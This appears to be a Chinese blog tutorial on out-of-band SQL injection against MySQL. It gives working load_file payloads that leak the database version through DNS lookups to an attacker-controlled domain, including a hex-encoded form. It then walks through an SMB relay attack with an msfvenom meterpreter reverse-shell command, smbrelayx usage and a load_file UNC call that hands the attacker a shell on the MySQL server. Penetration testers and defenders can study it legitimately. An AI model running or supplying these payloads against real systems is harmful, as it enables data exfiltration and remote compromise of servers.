美文网首页
SQL带外通道注入

SQL带外通道注入

作者: CMDY10086 | 来源:发表于2017-11-14 22:01 被阅读0次
带外通道攻击是什么

带外通道攻击主要是利用其他协议或者渠道从服务器提取数据. 它可能是HTTP(S)请求,DNS解析服务,SMB服务,Mail服务等.

条件限制

mysql的话secure_file_priv为空的时候可以使用,版本基本在5.5.53之前。
其他数据库未测试

DNS注入
  • select load_file(concat('\\',version(),'.hacker.site\a.txt'));
  • select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));
  • 这其中的.hacker.site是你搭建的DNS域名服务器的地址,如果没有的话可以去http://ceye.io注册个账号。
    能注入的原因即是MySQL在load_file()一个远程文件时会发送dns请求包去解析。当load_file()本地文件时便不会发出dns解析包
    test.png
SMB Relay 注入攻击
  • 以下转自rootclay的文章
  • 这里简单的描述一下SMB relay这个过程

假设有主机B与A

(1) A向B发起连接请求

(2) B向A发送挑战(一组随机数据,8字节)

(3) A用源自明文口令的DESKEY对挑战进行标准DES加密得到响应,并发往B

(4) B从SAM中获取A的LM Hash、NTLM Hash,计算出DESKEY,并对前面发往A的挑战进

行标准DES加密

(5) 如果(4)中计算结果与A送过来的响应匹配,A被允许访问B

现在假设一个攻击者C卷入其中

(1) C向B发起连接请求

(2) B向C发送挑战D(一组随机数据)

(3) C等待A向B发起连接请求

(4) 当A向B发起连接请求时,C伪造成B向A发送挑战D

(5) A用源自明文口令的DESKEY对挑战D进行标准DES加密得到响应E,并发往B

(6) C截获到响应E,将它做为针对(2)中挑战D的响应发往B,并声称自己是A

(7) B从SAM中获取A的LM Hash、NTLM Hash,计算出DESKEY,并对挑战D进行标准DES

加密

(8) 如果(7)中计算结果与C送过来的响应匹配,C被允许以A的身份访问B。

攻击流程

http://p4.qhimg.com/t016b9620690bd6e344.png

关于SMB relay攻击窃取NTML与shell请看这篇文章

SMB Relay Demystified and NTLMv2 Pwnage with Python

整理了一下实际操作的步骤如下:

首先生成一个反向shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f exe > reverse_shell.exe

运行

smbrelayx ,指定被攻击者和生成的反向shell,等待连接。

smbrelayx.py -h 被攻击者ip -e 反向shell文件位置

使用模块multi/handler。侦听攻击机ip,攻击机监听端口

在MySQL Server上运行如下的代码,则会产生shell。相当于访问攻击机的smb服务,但实际上是窃取了mysql_server的身份
select load_file('\攻击机ip\aa');

相关文章

  • SQL带外通道注入

    带外通道攻击是什么 带外通道攻击主要是利用其他协议或者渠道从服务器提取数据. 它可能是HTTP(S)请求,DNS解...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 谈谈sql注入之原理和防护(-)

    谈谈sql注入(二)谈谈sql注入(三)谈谈sql注入(四)所谓SQL注入,就是通过把SQL命令插入到Web表单提...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • 第四章 SQL 注入

    要点 SQL注入 SQL注入防护 一、SQL注入 SQL注入:黑客会通过构造一些恶意的输入参数,在应用拼接 SQL...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

  • 谈谈sql注入之语句构造手法(二)

    谈谈sql注入(一)谈谈sql注入(三)谈谈sql注入(四)SQL注入的手法相当灵活,在注入的时候会碰到很多意外的...

  • SQL注入三部曲-初级

    目录 什么是SQL注入SQL注入产生的原因SQL注入攻击方式如何进行SQL注入SQL注入三部曲 1.渗透攻防WEB...

  • sql注入那些事儿——如何优雅地进行SQL注入(3)

    传送门: sql注入那些事儿——如何优雅地进行SQL注入(1)sql注入那些事儿——如何优雅地进行SQL注入(2)...

网友评论

      本文标题:SQL带外通道注入

      本文链接:https://www.haomeiwen.com/subject/grlqvxtx.html